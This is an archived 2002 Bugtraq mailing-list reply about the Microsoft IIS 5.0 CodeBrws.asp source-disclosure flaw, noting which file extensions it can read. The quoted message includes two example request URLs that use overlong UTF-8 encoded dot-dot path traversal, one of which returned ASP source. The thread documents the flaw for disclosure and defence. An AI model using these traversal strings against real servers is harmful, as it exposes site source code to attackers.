[25118] in bugtraq
Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
daemon@ATHENA.MIT.EDU (H D Moore)
Wed Apr 17 19:02:20 2002
Content-Type: text/plain;
charset="iso-8859-1"
From: H D Moore <hdm@digitaloffense.net>
To: "Randy Hinders" <rahinders@hotmail.com>, sflist@digitaloffense.net,
bugtraq@securityfocus.com
Date: Wed, 17 Apr 2002 07:27:56 -0500
Cc: vulnwatch@vulnwatch.org
In-Reply-To: <F92SEs0wZPwW88XrFYC0000afe6@hotmail.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200204170727.56637.hdm@digitaloffense.net>
Right, you can only access files ending in the four "allowed" extensions.
These extensions are: .asp, .inc, .htm, and .html.
-HD
On Wednesday 17 April 2002 07:25 am, Randy Hinders wrote:
> While checking various files and extensions I wanted to ensure that other
> files were still "protected" from this. I was not able to read the
> global.asa but was able to read (as expected) other asp pages..
>
> http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%
>c0%ae%c0%ae/global.asa Returned "View Active Server Page Source-- Access
> Denied" to the browser.
>
> http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%
>c0%ae%c0%ae/iisstart.asp Returned the source code to the browser.
